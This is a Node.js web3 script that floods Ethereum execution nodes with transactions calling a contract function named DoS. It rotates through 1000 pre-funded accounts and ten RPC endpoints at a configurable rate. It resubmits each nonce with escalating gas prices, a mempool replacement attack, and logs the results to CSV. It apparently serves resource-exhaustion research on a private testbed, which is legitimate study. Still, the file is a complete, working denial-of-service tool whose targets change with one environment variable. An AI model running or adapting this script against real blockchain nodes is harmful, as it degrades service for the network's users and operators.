#!/usr/bin/env node

const { Web3 } = require("web3");
const fs = require("fs");

// ============================================================
// CONFIGURATION
// ============================================================

const CONTROL_RPC =
    process.env.RPC_URL ||
    "http://el-01-geth-lighthouse:8545";

const RPC_URLS = [
    "http://el-01-geth-lighthouse:8545",
    "http://el-02-geth-lighthouse:8545",
    "http://el-03-geth-lighthouse:8545",
    "http://el-04-geth-lighthouse:8545",
    "http://el-05-geth-lighthouse:8545",
    "http://el-06-geth-lighthouse:8545",
    "http://el-07-geth-lighthouse:8545",
    "http://el-08-geth-lighthouse:8545",
    "http://el-09-geth-lighthouse:8545",
    "http://el-10-geth-lighthouse:8545"
];

// ============================================================
// CONTRACT
// ============================================================

const ABI_PATH =
    process.env.ABI_PATH ||
    "/root/attack_testbed/artifacts/contracts/resource_ex_att_contract.sol/resource_ex_att_contract.json";

const CONTRACT_ADDRESS =
    process.env.CONTRACT_ADDRESS ||
    "0xB29dB8A6b1C596B64f7E1dD5358d59Db73648E17";

// ============================================================
// EXISTING ACCOUNTS
// ============================================================

// Generated by your setup/funding script.
const ACCOUNTS_FILE =
    process.env.ACCOUNTS_FILE ||
    "generated_1000_accounts.json";

// ============================================================
// ATTACK CONFIGURATION
// ============================================================

const TX_PER_SECOND =
    Number(
        process.env.TX_PER_SECOND ||
        100
    );

const TX_INTERVAL_MS =
    1000 / TX_PER_SECOND;

const TEST_DURATION_SECONDS =
    Number(
        process.env.TEST_DURATION_SECONDS ||
        600
    );

const TEST_DURATION_MS =
    TEST_DURATION_SECONDS * 1000;

// ============================================================
// CONTRACT WORKLOAD
// ============================================================

const COMPLEXITY =
    Number(
        process.env.COMPLEXITY ||
        5000
    );

const CONTRACT_GAS_LIMIT =
    BigInt(
        process.env.CONTRACT_GAS_LIMIT ||
        "16000000"
    );

// ============================================================
// REPLACEMENT GAS
// ============================================================

const BASE_GAS_PRICE_GWEI =
    process.env.BASE_GAS_PRICE_GWEI ||
    "1";

const REPLACEMENT_BUMP_PERCENT =
    Number(
        process.env.REPLACEMENT_BUMP_PERCENT ||
        10
    );

// ============================================================
// OUTPUT
// ============================================================

const RESULTS_FILE =
    process.env.RESULTS_FILE ||
    "replacement_attack_only_results.csv";

// ============================================================
// WEB3
// ============================================================

const controlWeb3 =
    new Web3(
        CONTROL_RPC
    );

const nodeWeb3 =
    RPC_URLS.map(
        url => new Web3(url)
    );

// ============================================================
// COUNTERS
// ============================================================

let scheduledAttempts = 0;
let rpcAccepted = 0;
let rpcErrors = 0;
let signingErrors = 0;
let nonceRecoveries = 0;

const outstanding =
    new Set();

// ============================================================
// HELPERS
// ============================================================

function sleep(ms) {

    return new Promise(
        resolve => setTimeout(resolve, ms)
    );
}


function nowISO() {

    return new Date().toISOString();
}


function escapeCSV(value) {

    return `"${String(value ?? "")
        .replace(/"/g, '""')}"`;
}


function getErrorMessage(error) {

    if (!error) {
        return "Unknown error";
    }

    if (
        error.cause &&
        error.cause.message
    ) {

        return error.cause.message;
    }

    if (error.message) {
        return error.message;
    }

    return String(error);
}


function isNonceTooLow(error) {

    const message =
        getErrorMessage(error)
            .toLowerCase();

    return (
        message.includes("nonce too low") ||
        message.includes("nonce is too low")
    );
}

// ============================================================
// VALIDATION
// ============================================================

function validateConfiguration() {

    if (
        !Number.isFinite(TX_PER_SECOND) ||
        TX_PER_SECOND <= 0
    ) {

        throw new Error(
            "TX_PER_SECOND must be > 0"
        );
    }

    if (
        !Number.isFinite(TEST_DURATION_SECONDS) ||
        TEST_DURATION_SECONDS <= 0
    ) {

        throw new Error(
            "TEST_DURATION_SECONDS must be > 0"
        );
    }

    if (
        !Number.isFinite(REPLACEMENT_BUMP_PERCENT) ||
        REPLACEMENT_BUMP_PERCENT < 0
    ) {

        throw new Error(
            "REPLACEMENT_BUMP_PERCENT must be >= 0"
        );
    }
}

// ============================================================
// CHECK RPC NODES
// ============================================================

async function testRPCNodes() {

    console.log(
        "\n============================================================"
    );

    console.log(
        "CHECKING EL RPC NODES"
    );

    console.log(
        "============================================================"
    );

    for (
        let i = 0;
        i < nodeWeb3.length;
        i++
    ) {

        try {

            const block =
                await nodeWeb3[i]
                    .eth
                    .getBlockNumber();

            console.log(
                `[OK] EL-${String(i + 1).padStart(2, "0")} ` +
                `block=${block}`
            );

        } catch (error) {

            throw new Error(
                `Cannot connect to ${RPC_URLS[i]}: ` +
                getErrorMessage(error)
            );
        }
    }
}

// ============================================================
// LOAD EXISTING ACCOUNTS
// ============================================================

function loadAccounts() {

    console.log(
        "\n============================================================"
    );

    console.log(
        "LOADING EXISTING ACCOUNTS"
    );

    console.log(
        "============================================================"
    );

    if (
        !fs.existsSync(
            ACCOUNTS_FILE
        )
    ) {

        throw new Error(
            `Account file not found: ${ACCOUNTS_FILE}`
        );
    }

    const stored =
        JSON.parse(
            fs.readFileSync(
                ACCOUNTS_FILE,
                "utf8"
            )
        );

    if (
        !Array.isArray(stored) ||
        stored.length === 0
    ) {

        throw new Error(
            "Account file is empty or invalid."
        );
    }

    const accounts =
        stored.map(
            (entry, index) => {

                if (
                    !entry.address ||
                    !entry.privateKey
                ) {

                    throw new Error(
                        `Invalid account at index ${index}`
                    );
                }

                return {

                    index:
                        entry.index ?? index,

                    address:
                        entry.address,

                    privateKey:
                        entry.privateKey,

                    // Read from network before attack.
                    nonce:
                        null,

                    // Current same-nonce replacement number.
                    submissionCount:
                        0,

                    // Incremented whenever nonce advances.
                    nonceCycle:
                        0,

                    // Prevent simultaneous recovery.
                    recoveringNonce:
                        false
                };
            }
        );

    console.log(
        `Loaded ${accounts.length} accounts.`
    );

    console.log(
        `File: ${ACCOUNTS_FILE}`
    );

    return accounts;
}

// ============================================================
// CHECK BALANCES
// ============================================================

async function checkAccountBalances(
    accounts
) {

    console.log(
        "\n============================================================"
    );

    console.log(
        "CHECKING ACCOUNT BALANCES"
    );

    console.log(
        "============================================================"
    );

    const BATCH_SIZE =
        100;

    let zeroBalance =
        0;

    let totalBalance =
        0n;

    for (
        let start = 0;
        start < accounts.length;
        start += BATCH_SIZE
    ) {

        const end =
            Math.min(
                start + BATCH_SIZE,
                accounts.length
            );

        const balances =
            await Promise.all(

                accounts
                    .slice(
                        start,
                        end
                    )
                    .map(
                        account =>
                            controlWeb3.eth
                                .getBalance(
                                    account.address
                                )
                    )
            );

        for (
            const balance of balances
        ) {

            const value =
                BigInt(balance);

            totalBalance +=
                value;

            if (
                value === 0n
            ) {

                zeroBalance++;
            }
        }

        console.log(
            `Checked balances ${end}/${accounts.length}`
        );
    }

    console.log(
        `Zero-balance accounts : ${zeroBalance}`
    );

    console.log(
        `Total account balance : ` +
        `${controlWeb3.utils.fromWei(
            totalBalance.toString(),
            "ether"
        )} ETH`
    );

    if (
        zeroBalance > 0
    ) {

        console.warn(
            `WARNING: ${zeroBalance} account(s) have zero balance.`
        );
    }
}

// ============================================================
// INITIALIZE CURRENT NONCES
// ============================================================

async function initializeNonces(
    accounts
) {

    console.log(
        "\n============================================================"
    );

    console.log(
        "READING CURRENT PENDING NONCES"
    );

    console.log(
        "============================================================"
    );

    const BATCH_SIZE =
        100;

    for (
        let start = 0;
        start < accounts.length;
        start += BATCH_SIZE
    ) {

        const end =
            Math.min(
                start + BATCH_SIZE,
                accounts.length
            );

        const promises =
            [];

        for (
            let i = start;
            i < end;
            i++
        ) {

            promises.push(

                controlWeb3.eth
                    .getTransactionCount(
                        accounts[i].address,
                        "pending"
                    )

                    .then(
                        nonce => {

                            accounts[i].nonce =
                                BigInt(nonce);

                            accounts[i].submissionCount =
                                0;

                            accounts[i].nonceCycle =
                                0;

                            accounts[i].recoveringNonce =
                                false;
                        }
                    )
            );
        }

        await Promise.all(
            promises
        );

        console.log(
            `Initialized ${end}/${accounts.length}`
        );
    }

    console.log(
        "\nAll current nonces loaded."
    );
}

// ============================================================
// GAS PRICE
// ============================================================

function calculateReplacementGasPrice(
    baseGasPriceWei,
    replacementNumber
) {

    if (
        replacementNumber === 0
    ) {

        return baseGasPriceWei;
    }

    let price =
        baseGasPriceWei;

    for (
        let i = 0;
        i < replacementNumber;
        i++
    ) {

        const numerator =
            price *
            BigInt(
                100 +
                REPLACEMENT_BUMP_PERCENT
            );

        let bumped =
            numerator /
            100n;

        if (
            bumped <= price
        ) {

            bumped =
                price + 1n;
        }

        price =
            bumped;
    }

    return price;
}

// ============================================================
// CSV
// ============================================================

function initializeCSV() {

    const header = [

        "sequence",

        "scheduled_timestamp",

        "response_timestamp",

        "elapsed_ms",

        "account_index",

        "account_address",

        "nonce",

        "nonce_cycle",

        "submission_number",

        "replacement_number",

        "transaction_type",

        "el_node",

        "rpc_url",

        "complexity",

        "gas_price_wei",

        "transaction_hash",

        "status",

        "error"

    ].join(",");

    fs.writeFileSync(
        RESULTS_FILE,
        header + "\n",
        "utf8"
    );
}


function appendResult(
    result
) {

    const row = [

        result.sequence,

        escapeCSV(
            result.scheduledTimestamp
        ),

        escapeCSV(
            result.responseTimestamp
        ),

        result.elapsedMs,

        result.accountIndex,

        escapeCSV(
            result.address
        ),

        result.nonce,

        result.nonceCycle,

        result.submissionNumber,

        result.replacementNumber,

        escapeCSV(
            result.transactionType
        ),

        escapeCSV(
            result.elNode
        ),

        escapeCSV(
            result.rpcURL
        ),

        result.complexity,

        result.gasPriceWei,

        escapeCSV(
            result.hash || ""
        ),

        escapeCSV(
            result.status
        ),

        escapeCSV(
            result.error || ""
        )

    ].join(",");

    fs.appendFileSync(
        RESULTS_FILE,
        row + "\n"
    );
}

// ============================================================
// NONCE RECOVERY
// ============================================================

async function recoverAccountNonce(
    account,
    accountIndex
) {

    if (
        account.recoveringNonce
    ) {

        return false;
    }

    account.recoveringNonce =
        true;

    try {

        const oldNonce =
            account.nonce;

        const currentNonce =
            BigInt(
                await controlWeb3.eth
                    .getTransactionCount(
                        account.address,
                        "pending"
                    )
            );

        if (
            currentNonce >
            oldNonce
        ) {

            account.nonce =
                currentNonce;

            // New nonce starts new attack cycle.
            account.submissionCount =
                0;

            account.nonceCycle++;

            nonceRecoveries++;

            console.log(
                "\n============================================================"
            );

            console.log(
                "[NONCE ADVANCED]"
            );

            console.log(
                `Account    : ${accountIndex + 1}`
            );

            console.log(
                `Address    : ${account.address}`
            );

            console.log(
                `Old nonce  : ${oldNonce}`
            );

            console.log(
                `New nonce  : ${currentNonce}`
            );

            console.log(
                `Cycle      : ${account.nonceCycle}`
            );

            console.log(
                "============================================================\n"
            );

            return true;
        }

        console.log(
            `[NONCE CHECK] ` +
            `account=${accountIndex + 1} ` +
            `old=${oldNonce} ` +
            `network=${currentNonce}`
        );

        return false;

    } catch (error) {

        console.error(
            `[NONCE RECOVERY ERROR] ` +
            `account=${accountIndex + 1} ` +
            `${getErrorMessage(error)}`
        );

        return false;

    } finally {

        account.recoveringNonce =
            false;
    }
}

// ============================================================
// SEND RAW TRANSACTION
// ============================================================

// async function sendRawTransaction(
//     web3,
//     rawTransaction
// ) {

//     // Using raw JSON-RPC request avoids depending on
//     // receipt handling for the attack loop.
//     //
//     // We only need eth_sendRawTransaction acceptance/hash.

//     return await web3.request({

//         method:
//             "eth_sendRawTransaction",

//         params:
//             [
//                 rawTransaction
//             ]
//     });
// }
async function sendRawTransaction(
    web3,
    rawTransaction
) {
    return new Promise((resolve, reject) => {

        let finished = false;

        const finishSuccess = (hash) => {
            if (finished) {
                return;
            }

            finished = true;
            resolve(hash);
        };

        const finishError = (error) => {
            if (finished) {
                return;
            }

            finished = true;
            reject(error);
        };

        try {
            const promiEvent =
                web3.eth.sendSignedTransaction(
                    rawTransaction
                );

            // We only need acceptance/hash.
            // Do not wait for transaction receipt.
            promiEvent.once(
                "transactionHash",
                hash => {
                    finishSuccess(hash);
                }
            );

            promiEvent.once(
                "error",
                error => {
                    finishError(error);
                }
            );

            // Prevent an unhandled rejection from the
            // underlying PromiEvent promise.
            if (
                promiEvent &&
                typeof promiEvent.catch === "function"
            ) {
                promiEvent.catch(
                    error => {
                        finishError(error);
                    }
                );
            }

        } catch (error) {
            finishError(error);
        }
    });
}


// ============================================================
// SUBMIT ONE ATTACK TRANSACTION
// ============================================================

async function submitTransaction(
    sequence,
    account,
    accountIndex,
    nodeIndex,
    chainId,
    encodedCall,
    baseGasPriceWei,
    experimentStart
) {

    const web3 =
        nodeWeb3[
            nodeIndex
        ];

    const rpcURL =
        RPC_URLS[
            nodeIndex
        ];

    const elNode =
        `el-${String(
            nodeIndex + 1
        ).padStart(2, "0")}-geth-lighthouse`;

    // --------------------------------------------------------
    // Snapshot account state.
    // --------------------------------------------------------

    const nonce =
        account.nonce;

    const nonceCycle =
        account.nonceCycle;

    const replacementNumber =
        account.submissionCount;

    const submissionNumber =
        replacementNumber + 1;

    const transactionType =
        replacementNumber === 0
            ? "INITIAL"
            : "REPLACEMENT";

    const gasPriceWei =
        calculateReplacementGasPrice(
            baseGasPriceWei,
            replacementNumber
        );

    const scheduledTimestamp =
        nowISO();

    const transaction = {

        from:
            account.address,

        to:
            CONTRACT_ADDRESS,

        value:
            "0",

        gas:
            CONTRACT_GAS_LIMIT.toString(),

        gasPrice:
            gasPriceWei.toString(),

        nonce:
            nonce.toString(),

        chainId:
            Number(chainId),

        data:
            encodedCall
    };

    // Count this scheduled submission in the current
    // replacement chain.
    account.submissionCount++;

    try {

        // ====================================================
        // SIGN
        // ====================================================

        const signed =
            await web3.eth.accounts
                .signTransaction(
                    transaction,
                    account.privateKey
                );

        if (
            !signed.rawTransaction
        ) {

            throw new Error(
                "Signing returned no raw transaction."
            );
        }

        // ====================================================
        // SEND
        // ====================================================

        const hash =
            await sendRawTransaction(
                web3,
                signed.rawTransaction
            );

        rpcAccepted++;

        appendResult({

            sequence:
                sequence + 1,

            scheduledTimestamp,

            responseTimestamp:
                nowISO(),

            elapsedMs:
                Date.now() -
                experimentStart,

            accountIndex:
                accountIndex + 1,

            address:
                account.address,

            nonce:
                nonce.toString(),

            nonceCycle,

            submissionNumber,

            replacementNumber,

            transactionType,

            elNode,

            rpcURL,

            complexity:
                COMPLEXITY,

            gasPriceWei:
                gasPriceWei.toString(),

            hash,

            status:
                "ACCEPTED",

            error:
                ""
        });

        console.log(
            `[${transactionType}] ` +
            `seq=${sequence + 1} ` +
            `account=${accountIndex + 1} ` +
            `nonce=${nonce} ` +
            `cycle=${nonceCycle} ` +
            `replacement=${replacementNumber} ` +
            `node=${elNode} ` +
            `gas=${gasPriceWei} ` +
            `hash=${hash}`
        );

    } catch (error) {

        const message =
            getErrorMessage(
                error
            );

        // ====================================================
        // NONCE TOO LOW
        // ====================================================

        if (
            isNonceTooLow(error)
        ) {

            rpcErrors++;

            appendResult({

                sequence:
                    sequence + 1,

                scheduledTimestamp,

                responseTimestamp:
                    nowISO(),

                elapsedMs:
                    Date.now() -
                    experimentStart,

                accountIndex:
                    accountIndex + 1,

                address:
                    account.address,

                nonce:
                    nonce.toString(),

                nonceCycle,

                submissionNumber,

                replacementNumber,

                transactionType,

                elNode,

                rpcURL,

                complexity:
                    COMPLEXITY,

                gasPriceWei:
                    gasPriceWei.toString(),

                hash:
                    "",

                status:
                    "NONCE_TOO_LOW",

                error:
                    message
            });

            console.error(
                `[NONCE TOO LOW] ` +
                `account=${accountIndex + 1} ` +
                `nonce=${nonce} ` +
                `${message}`
            );

            // Recover without terminating experiment.
            await recoverAccountNonce(
                account,
                accountIndex
            );

            return;
        }

        // ====================================================
        // OTHER RPC ERROR
        // ====================================================

        rpcErrors++;

        appendResult({

            sequence:
                sequence + 1,

            scheduledTimestamp,

            responseTimestamp:
                nowISO(),

            elapsedMs:
                Date.now() -
                experimentStart,

            accountIndex:
                accountIndex + 1,

            address:
                account.address,

            nonce:
                nonce.toString(),

            nonceCycle,

            submissionNumber,

            replacementNumber,

            transactionType,

            elNode,

            rpcURL,

            complexity:
                COMPLEXITY,

            gasPriceWei:
                gasPriceWei.toString(),

            hash:
                "",

            status:
                "RPC_ERROR",

            error:
                message
        });

        console.error(
            `[RPC ERROR] ` +
            `seq=${sequence + 1} ` +
            `account=${accountIndex + 1} ` +
            `nonce=${nonce} ` +
            `node=${elNode} ` +
            `${message}`
        );
    }
}

// ============================================================
// RUN ATTACK
// ============================================================

async function runExperiment(
    accounts,
    chainId,
    encodedCall,
    baseGasPriceWei
) {

    const expectedSubmissions =
        Math.floor(
            TX_PER_SECOND *
            TEST_DURATION_SECONDS
        );

    console.log(
        "\n============================================================"
    );

    console.log(
        "ATTACK-ONLY SAME-NONCE REPLACEMENT EXPERIMENT"
    );

    console.log(
        "============================================================"
    );

    console.log(
        `Existing accounts       : ${accounts.length}`
    );

    console.log(
        `Target tx/sec           : ${TX_PER_SECOND}`
    );

    console.log(
        `Global gap              : ${TX_INTERVAL_MS} ms`
    );

    console.log(
        `Duration                : ${TEST_DURATION_SECONDS} sec`
    );

    console.log(
        `Expected submissions    : ${expectedSubmissions}`
    );

    console.log(
        `EL nodes                : ${RPC_URLS.length}`
    );

    console.log(
        `Base gas                : ${BASE_GAS_PRICE_GWEI} gwei`
    );

    console.log(
        `Replacement bump        : ${REPLACEMENT_BUMP_PERCENT}%`
    );

    console.log(
        `Workload                : DoS(${COMPLEXITY})`
    );

    console.log(
        "Nonce policy            : replace → mined → next nonce → replace"
    );

    console.log(
        "============================================================\n"
    );

    const startTime =
        Date.now();

    const endTime =
        startTime +
        TEST_DURATION_MS;

    let sequence =
        0;

    while (
        sequence <
        expectedSubmissions
    ) {

        // ----------------------------------------------------
        // Absolute scheduling.
        // ----------------------------------------------------

        const targetTime =
            startTime +
            (
                sequence *
                TX_INTERVAL_MS
            );

        const delay =
            targetTime -
            Date.now();

        if (
            delay > 0
        ) {

            await sleep(
                delay
            );
        }

        if (
            Date.now() >=
            endTime
        ) {

            break;
        }

        // ----------------------------------------------------
        // Account rotation.
        // ----------------------------------------------------

        const accountIndex =
            sequence %
            accounts.length;

        const account =
            accounts[
                accountIndex
            ];

        // ----------------------------------------------------
        // Node rotation.
        // ----------------------------------------------------

        const nodeIndex =
            sequence %
            nodeWeb3.length;

        scheduledAttempts++;

        // ----------------------------------------------------
        // DO NOT await.
        //
        // Keeps scheduler independent of RPC latency.
        // ----------------------------------------------------

        const operation =
            submitTransaction(

                sequence,

                account,

                accountIndex,

                nodeIndex,

                chainId,

                encodedCall,

                baseGasPriceWei,

                startTime
            );

        outstanding.add(
            operation
        );

        operation

            .catch(
                error => {

                    console.error(
                        "[UNEXPECTED ERROR]",
                        getErrorMessage(
                            error
                        )
                    );
                }
            )

            .finally(
                () => {

                    outstanding.delete(
                        operation
                    );
                }
            );

        sequence++;

        // ----------------------------------------------------
        // Progress
        // ----------------------------------------------------

        if (
            sequence % 1000 === 0
        ) {

            const elapsed =
                (
                    Date.now() -
                    startTime
                ) /
                1000;

            console.log(
                "\n------------------------------------------------------------"
            );

            console.log(
                `Scheduled        : ${sequence}`
            );

            console.log(
                `Elapsed          : ${elapsed.toFixed(2)} sec`
            );

            console.log(
                `Scheduler rate   : ${(sequence / elapsed).toFixed(2)} tx/sec`
            );

            console.log(
                `RPC accepted     : ${rpcAccepted}`
            );

            console.log(
                `RPC errors       : ${rpcErrors}`
            );

            console.log(
                `Nonce recoveries : ${nonceRecoveries}`
            );

            console.log(
                `Outstanding      : ${outstanding.size}`
            );

            console.log(
                "------------------------------------------------------------\n"
            );
        }
    }

    // ========================================================
    // DRAIN
    // ========================================================

    console.log(
        "\nScheduling finished."
    );

    const drainDeadline =
        Date.now() +
        30000;

    while (
        outstanding.size > 0 &&
        Date.now() < drainDeadline
    ) {

        console.log(
            `Waiting for ${outstanding.size} outstanding RPC calls...`
        );

        await sleep(
            1000
        );
    }

    const elapsed =
        (
            Date.now() -
            startTime
        ) /
        1000;

    console.log(
        "\n============================================================"
    );

    console.log(
        "FINAL RESULTS"
    );

    console.log(
        "============================================================"
    );

    console.log(
        `Scheduled attempts : ${scheduledAttempts}`
    );

    console.log(
        `RPC accepted       : ${rpcAccepted}`
    );

    console.log(
        `RPC errors         : ${rpcErrors}`
    );

    console.log(
        `Nonce recoveries   : ${nonceRecoveries}`
    );

    console.log(
        `Outstanding        : ${outstanding.size}`
    );

    console.log(
        `Elapsed            : ${elapsed.toFixed(2)} sec`
    );

    console.log(
        `CSV                : ${RESULTS_FILE}`
    );

    console.log(
        "============================================================"
    );
}

// ============================================================
// MAIN
// ============================================================

async function main() {

    validateConfiguration();

    await testRPCNodes();

    // ========================================================
    // LOAD EXISTING ACCOUNTS
    // ========================================================

    const accounts =
        loadAccounts();

    // ========================================================
    // CONTRACT
    // ========================================================

    const artifact =
        require(
            ABI_PATH
        );

    if (
        !artifact.abi
    ) {

        throw new Error(
            `ABI not found: ${ABI_PATH}`
        );
    }

    const contract =
        new controlWeb3.eth.Contract(
            artifact.abi,
            CONTRACT_ADDRESS
        );

    const encodedCall =
        contract.methods
            .DoS(
                COMPLEXITY
            )
            .encodeABI();

    // ========================================================
    // CHAIN
    // ========================================================

    const chainId =
        await controlWeb3.eth
            .getChainId();

    const baseGasPriceWei =
        BigInt(
            controlWeb3.utils
                .toWei(
                    BASE_GAS_PRICE_GWEI,
                    "gwei"
                )
        );

    console.log(
        "\n============================================================"
    );

    console.log(
        "ATTACK-ONLY CONFIGURATION"
    );

    console.log(
        "============================================================"
    );

    console.log(
        `Account file    : ${ACCOUNTS_FILE}`
    );

    console.log(
        `Accounts        : ${accounts.length}`
    );

    console.log(
        `Contract        : ${CONTRACT_ADDRESS}`
    );

    console.log(
        `Chain ID        : ${chainId}`
    );

    console.log(
        `TX/sec          : ${TX_PER_SECOND}`
    );

    console.log(
        `Duration        : ${TEST_DURATION_SECONDS} sec`
    );

    console.log(
        `Complexity      : ${COMPLEXITY}`
    );

    console.log(
        "============================================================"
    );

    // ========================================================
    // MAKE SURE ACCOUNTS STILL HAVE FUNDS
    // ========================================================

    // await checkAccountBalances(
    //     accounts
    // );
    console.log("\n============================================================");
    console.log("SKIPPING ACCOUNT BALANCE CHECK");
    console.log("============================================================");
    console.log(`Using ${accounts.length} previously funded accounts.`);

    // ========================================================
    // IMPORTANT:
    //
    // Do NOT assume nonce=0.
    //
    // These accounts may have already participated in previous
    // attacks. Read current pending nonce before every new run.
    // ========================================================

    await initializeNonces(
        accounts
    );

    // ========================================================
    // OUTPUT
    // ========================================================

    initializeCSV();

    // ========================================================
    // ATTACK
    // ========================================================

    await runExperiment(
        accounts,
        chainId,
        encodedCall,
        baseGasPriceWei
    );
}

// ============================================================
// START
// ============================================================

main()

    .then(
        () => {

            console.log(
                "\nAttack-only experiment completed successfully."
            );

            process.exit(
                0
            );
        }
    )

    .catch(
        error => {

            console.error(
                "\nFatal error:"
            );

            console.error(
                getErrorMessage(
                    error
                )
            );

            process.exit(
                1
            );
        }
    );